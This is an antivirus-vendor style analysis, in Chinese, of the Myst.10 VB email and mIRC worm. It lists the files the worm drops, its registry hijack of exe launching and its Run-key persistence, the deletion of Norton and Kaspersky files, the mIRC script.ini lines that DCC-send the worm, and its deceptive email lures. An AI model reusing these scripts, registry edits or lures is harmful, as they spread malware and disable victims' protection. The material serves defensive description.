Worm.Myst.10

病毒名称(中文):

我的最爱

病毒别名:

Email-Worm.Win32.generic[AVP],I-Worm/Myst.10[KV],W

威胁级别:

★★☆☆☆

病毒类型:

蠕虫病毒

病毒长度:

80384

影响系统:

Win9xWinNT

病毒行为:

这是一个用VB编写的蠕虫病毒，该病毒通过电子邮件和mIRC聊天系统进行传播。该病毒会修改.exe的文件关联到病毒，使得每次运行exe文件的时候该病毒都会被执行；该病毒会删除三款杀毒软件的某些数据使得这些杀毒软件无法正常运行。该病毒除了通过在Outlook地址薄里面收集邮件地址，将病毒做为附件发送出去之外，它还会通过向mIRC的脚本配置文件中写入一些脚本，使得该病毒能够通过mIRC聊天系统传播。

1)病毒将自己拷贝到：

C:\windows\system\systray_.exe

C:\windows\system\runtray_.dll

2)释放临时文件C:\ModReg.reg，并通过regedit/sC:\ModReg.reg命令写入注册表

修改exe的文件关联到病毒，使得每次运行exe文件的时候该病毒都会被执行

HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default)=""C:\windows\system\systray_.exe"%1%*"

HKEY_LOCAL_MACHINE\Software\McAfee\Scan95

"SerialNum"="MYSTv1.0byMYSTiQUE"

"CurrentVersionNumber"="666"

"DAT"="NONE"

"DATFile"="-2000"

"VirusInfoURL"="http://ma***.sexchat.***"

"bVShieldEnabled"=0x0

为病毒添加启动项：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"SystemTray"="C:\Windows\system\systray_.exe"

3)向mIRC的脚本配置文件C:\mirc\script.ini中写入以下内容，使得该病毒能够通过mIRC聊天系统传播

[script]

n0=on1:TEXT:*sex*:#:{

n1=.msg$nickHello,sorrytodisturbyou,butIjustgotaverykinkyadultslideshowandwaswonderingifyouwouldlikeacopy.SoI"mgoingtosendyouone.

n2=.copyC:\windows\system\runtray_.dllC:\windows\system\install_show.exe

n3=.dccsend$nickC:\windows\system\install_show.exe

n4=}

4)删除三款杀毒软件的以下文件：

C:\ProgramFiles\NortonAntiVirus\*.dat

C:\ProgramFiles\KasperskyLab\KasperskyAnti-VirusPersonalPro\*.*

C:\ProgramFiles\CommonFiles\KAVSharedFiles\*.*

5)在Outlook里面收集邮件地址，并将病毒做为附件发送给这些邮件接收者

取下面的某一行做为邮件主题：

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanadultscreensaverslideshowprogram

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanOutlookServiceReleaseupgrade

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforaMicrosoftExplorerPatch

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforaDesktopGameIgotofftheinternet

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforabrand-newMP3playerandplug-ins

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanMicrosoftInternetExplorerServicePack(Q401243)

Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanKasperskyAnti-Virus4.0bugfix

邮件正文：

Hey,sorryIhaven"twrittentoyouinawhile.Wellyoucouldcallitawhile.I"mwritingthisE-mailtoletyouknowofanattachmentimsendingwiththenextmail.

Hereitis

邮件附件：C:\windows\install_.exe